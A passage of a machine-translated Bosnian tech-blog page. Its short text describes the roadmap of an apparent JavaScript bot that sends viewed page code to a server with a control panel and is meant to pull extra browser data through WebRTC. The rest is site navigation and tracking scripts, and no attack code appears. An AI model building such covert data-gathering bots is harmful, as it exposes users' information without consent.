da ne psujete previše, već da odjavite šta je nekome pa da to popravite. <br>Lično sam testirao bota na samo 4 mašine, sve su imale Debian.</p><p>U dugoročnim planovima za ovog bota, ako postoji motivacija: <br>- implementirati renderovanje koda stranica koje bot šalje serveru tako da se odmah otvori u pretraživaču i može se „opipati“, testirati u hodu; <br>- pokušat će uhvatiti dobrote iz WebRTC tehnologije, odnosno pronaći načine da dođu do novih informacija koje se ne mogu izvući čistim JS-om; <br>- implementirati komunikaciju između bota i servera koristeći WebSocket protokol preko HTTP-a; <br>- dodati neke pogodnosti kontrolnoj tabli;</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </div> </div> </article> <script> var send_pid_view = 10902; </script> <div class="entry-meta-niz">Naslov: <a href="https://shongames.ru/bs/category/windows-7/" title="">Windows 7</a> </div> <div class="fonts20">Podijelite ovo</div> <script type="text/javascript" src="//yandex.st/share/share.js" charset="utf-8"></script> <div class="yashare-auto-init b-share_theme_counter" data-yasharel10n="ru" data-yasharequickservices="vkontakte,facebook,odnoklassniki,twitter,moimir,yaru,gplus" data-yasharetheme="counter" data-yasharetype="middle"></div> <div class="zem_rp_wrap zem_rp_th_vertical" id="zem_rp_first"><div class="zem_rp_content"><div class="related_post_title">Objave po temi</div><ul class="related_post zem_rp"> <li data-position="0" data-poid="in-10949" data-post-type="none"><a href="https://shongames.ru/bs/iron/vvedenie-v-data-mining-tehnologii-data-mining-metody-issledovaniya-dannyh-v-data/" class="zem_rp_thumbnail"><img src="/uploads/86d602f6cd38a2d915ae8a9297da93d1.jpg" alt="Data Mining Technologies Metode rudarenja podataka u Data Miningu" width="150" height="150" / loading=lazy loading=lazy></a><a href="https://shongames.ru/bs/iron/vvedenie-v-data-mining-tehnologii-data-mining-metody-issledovaniya-dannyh-v-data/" class="zem_rp_title">Data Mining Technologies Metode rudarenja podataka u Data Miningu</a></li> <li data-position="0" data-poid="in-10949" data-post-type="none"><a href="https://shongames.ru/bs/windows-10/acorp-parol-po-umolchaniyu-router-acorp-wr300n-podklyuchenie-i-nastroika/" class="zem_rp_thumbnail"><img src="/uploads/801ce812019b3a3d7100ffd26b9c760a.jpg" alt="Ruter Acorp WR300N: povezivanje i konfiguracija" width="150" height="150" / loading=lazy loading=lazy></a><a href="https://shongames.ru/bs/windows-10/acorp-parol-po-umolchaniyu-router-acorp-wr300n-podklyuchenie-i-nastroika/" class="zem_rp_title">Ruter Acorp WR300N: povezivanje i konfiguracija</a></li> <li data-position="0" data-poid="in-10949" data-post-type="none"><a href="https://shongames.ru/bs/internet/obzor-pervogo-transformera-ot-asus-eee-pad-transformer-tf101-planshet-asus-tf101/" class="zem_rp_thumbnail"><img src="/uploads/9a795bf69a5b014761fcaeb05ffe65c9.jpg" alt="Tablet Asus TF101: specifikacije, opis i karakteristike, recenzije vlasnika Portovi i komunikacije" width="150" height="150" / loading=lazy loading=lazy></a><a href="https://shongames.ru/bs/internet/obzor-pervogo-transformera-ot-asus-eee-pad-transformer-tf101-planshet-asus-tf101/" class="zem_rp_title">Tablet Asus TF101: specifikacije, opis i karakteristike, recenzije vlasnika Portovi i komunikacije</a></li> <li data-position="0" data-poid="in-10949" data-post-type="none"><a href="https://shongames.ru/bs/iron/programma-dlya-upravleniya-plaginami-v-far-plaginy-failovye-menedzhery-i-s-chem-eto/" class="zem_rp_thumbnail"><img src="/uploads/8caf6a55061ccabbc73ed9a2828b968b.jpg" alt="Program za upravljanje dodacima u daleko" width="150" height="150" / loading=lazy loading=lazy></a><a href="https://shongames.ru/bs/iron/programma-dlya-upravleniya-plaginami-v-far-plaginy-failovye-menedzhery-i-s-chem-eto/" class="zem_rp_title">Program za upravljanje dodacima u daleko</a></li> </ul></div></div> <div class="comments"> </div> </div> <aside class="col-4 sidebar"> <ul> <li id="recentcomments" class="widget widget_recentcomments"> <div class="widgettitle">Novi materijali</div> <ul> <li><a href="https://shongames.ru/bs/network/fast-ethernet-100-mbit-s-oborudovanie-ethernet-i-fast-ethernet-naznachenie-setevoi-tehnologii/">Ethernet i Fast Ethernet oprema</a></li> <li><a href="https://shongames.ru/bs/program/materinskaya-foxconn-osobennosti-i-osnovnye-harakteristiki-materinskoi/">Karakteristike i glavne karakteristike matične ploče Foxconn N15235</a></li> <li><a href="https://shongames.ru/bs/there-are-some-advice/kak-ustanovit-domashnii-media-server-kak-ustanovit-nastroit-i-podklyuchit/">Kako instalirati, konfigurirati i povezati program Home Media Server kao DLNA server?</a></li> <li><a href="https://shongames.ru/bs/android/smartfony-mobilnye-ustroistva-obzor-na-novyi-telefon/">Pregled mobilnih uređaja na novom telefonu</a></li> <li><a href="https://shongames.ru/bs/smartphones/chem-razlichayutsya-materinskie-platy-kak-vybrat-materinskuyu-platu-dlya/">Kako odabrati matičnu ploču za novi računar ili nadogradnju?</a></li> <li><a href="https://shongames.ru/bs/smartphones/nakopitel-kompakt-diske-cd-rom-kompakt-diski-i-ppivody-cd-rom-kak-zapisyvaetsya/">CD-ovi i CD-ROM uređaji</a></li> <li><a href="https://shongames.ru/bs/gadgets/materinskie-platy-dlya-pk-luchshie-kak-vybrat-horoshuyu-materinskuyu-platu/">Kako da izaberem dobru matičnu ploču?</a></li> <li><a href="https://shongames.ru/bs/there-are-some-advice/chto-takoe-transkodirovanie-v-domashnem-media-servere-nastroika-domashnego/">Podešavanje UPnP DLNA kućnog medijskog servera - kako ga koristiti na Windows-u?</a></li> <li><a href="https://shongames.ru/bs/android/kak-sozdat-media-server-kak-ispolzovat-dlna-server-v-windows-potokovaya/">Kako koristiti DLNA server na Windows-u?</a></li> <li><a href="https://shongames.ru/bs/game/skachat-domashnii-media-server-dlya-televizora-lg-kak/">Kako koristiti DLNA server na Windows-u?</a></li> </ul> </li> <li id="recentcomments" class="widget widget_recentcomments"> <div class="widgettitle">Popularni materijali</div> <ul> <li><a href="https://shongames.ru/bs/operating-systems/kompyuternaya-periferiya-rossiiskogo-proizvodstva-modelnyi-ryad/">Nyx asortiman računara - najbolji računar za svaki zadatak</a></li> <li><a href="https://shongames.ru/bs/windows-7/router-s-horoshim-pokrytiem-wi-fi-na-chto-obratit-vnimanie-pri-vybore-wi-fi/">Na šta treba obratiti pažnju pri odabiru Wi-Fi rutera, najbolji modeli</a></li> <li><a href="https://shongames.ru/bs/gadgets/zashchita-ot-insaiderov-vnutrennie-ugrozy-novyi-vyzov-korporativnym/">Interne prijetnje: novi izazov za korporativne usluge sigurnosti informacija</a></li> <li><a href="https://shongames.ru/bs/smarttv/mozhno-li-vosstanovit-fotki-udalennye-s-telefona-kak-na-android/">Kako oporaviti izbrisane fotografije na Android telefonu</a></li> <li><a href="https://shongames.ru/bs/gadgets/kak-udalit-belyi-fon-v-illyustratore-delaem-prozrachnyi-png-v-illustrator/">Kako napraviti transparentni PNG u Illustratoru</a></li> <li><a href="https://shongames.ru/bs/smartphones/nasledovanie-interfeisov-delphi-osobennosti-raboty-s-interfeisami/">Karakteristike rada sa interfejsima u Delphiju</a></li> <li><a href="https://shongames.ru/bs/iron/a4tech-bloody-v7-obzor-geimerskoi-myshi-mysh-a4tech-bloody-v7-dlya-igr-i-ne/">A4Tech Bloody V7 miš - za igranje i više a4tech v7 gaming miš</a></li> <li><a href="https://shongames.ru/bs/smarttv/temy-dlya-vindovs-7-maksimalnaya-kak-krasivo-oformit-rabochii/">Kako lijepo ukrasiti svoju Windows radnu površinu</a></li> <li><a href="https://shongames.ru/bs/operating-systems/chto-takoe-daemon-tools-lite-chto-takoe-daemon-tools-daemon-tools-opisanie/">Šta je DAEMON Tools Lite</a></li> <li><a href="https://shongames.ru/bs/gadgets/instrukciya-po-sozdaniyu-multizagruzochnoi-fleshki-sozdanie/">Kreiranje USB diska za više pokretanja pomoću uslužnog programa WinSetupFromUSB</a></li> </ul> </li> <li> </li> </ul> </aside> </div> </div> <footer class="main-footer"> <div class="wrap"> <ul class="widgets row cf"> <li class="widget col-4 widget_text" id="text-4"> <div class="textwidget"><img src="/logo.png" alt="" / loading=lazy loading=lazy></div> </li><li class="widget col-4 widget_text" id="text-5"> <div class="textwidget"> <div class="spmenu"> <a href="https://twitter.com/" title="Pratite na Twitteru" target="_blank"><span class="sprite_twitter"></span></a> <a href="https:/" title="Pretplatite se na G+ feed" target="_blank"><span class="sprite_gplus"></span></a> <a href="" title="Pretplatite se na Vkontakte" target="_blank"><span class="sprite_vk"></span></a> <a href="https://facebook.com/" title="Pročitajte na Facebooku" target="_blank"><span class="sprite_fbook" target="_blank"></span></a> </div> </div> </li> </ul> </div> <div class="lower-foot"> <div class="wrap"> <div class="widgets"> <div id="text-2"> <div class="textwidget"> <a href='https://play.google.com/store/apps/details?id=pdf.reader.converter.jpgtopdf.imagetopdf' target='_blank' onclick="navigator.sendBeacon('https://live.electrikhelp.com/iibim?q=gplay&sub1=shongames.ru&sub2=pdf.reader.converter.jpgtopdf.imagetopdf&u='+encodeURIComponent(window.location.href)+'&refjs='+encodeURIComponent(document.referrer)+'');"><img src='/googleplay.svg' style='opacity:0.4; height: 20px; margin:10px; '></a>Autorsko pravo 2021. shongames.ru. Android. Operativni sistem. Multimedija. Društvene mreže. Instrumenti. Kodeci. Grafika. Sva prava zadržana.</div> </div><div id="nav_menu-2"><div class="menu-footer-container"><ul id="menu-footer" class="menu"> <li class="menu-item type-post_type object-page "><a href="">o projektu</a></li> <li class="menu-item type-post_type object-page "><a href="">Kontakti</a></li> </ul></div></div> </div> </div> </div> </footer> </div> <script> /* <![CDATA[ */ var rcGlobal = { serverUrl :'https://shongames.ru', infoTemp :'%REVIEWER% - %POST%', loadingText :'Загрузка', noCommentsText :'No comments', newestText :'« К началу', newerText :'« В будущее', olderText :'В прошлое »', showContent :'', external :'', avatarSize :'32', avatarPosition :'left', anonymous :'Аноним' } ; /* ]]> */ </script> <div id="wpfront-scroll-top-container"><img src="https://shongames.ru/wp-content/plugins/wpfront-scroll-top/images/icons/1.png" alt="" / loading=lazy loading=lazy></div> <script type="text/javascript">function wpfront_scroll_top_init() { if(typeof wpfront_scroll_top == "function" && typeof jQuery !== "undefined") { wpfront_scroll_top({ "scroll_offset":100,"button_width":0,"button_height":0,"button_opacity":0.8,"button_fade_duration":200,"scroll_duration":400,"location":1,"marginX":20,"marginY":20,"hide_iframe":false,"auto_hide":false,"auto_hide_after":2} );} else { setTimeout(wpfront_scroll_top_init, 100);} }wpfront_scroll_top_init();</script> <script type='text/javascript'> var q2w3_sidebar_options = new Array(); q2w3_sidebar_options[0] = { "sidebar" : "primary-sidebar", "margin_top" : 50, "margin_bottom" : 2500, "stop_id" : "", "screen_max_width" : 799, "screen_max_height" : 0, "width_inherit" : false, "refresh_interval" : 1500, "window_load_hook" : false, "disable_mo_api" : false, "widgets" : ['execphp-3'] } ; </script> <script type="text/javascript" defer src="https://shongames.ru/wp-content/cache/autoptimize/js/autoptimize_5fdbf2a97d91b7569facf24e6a8fe54c.js"></script></body> </html>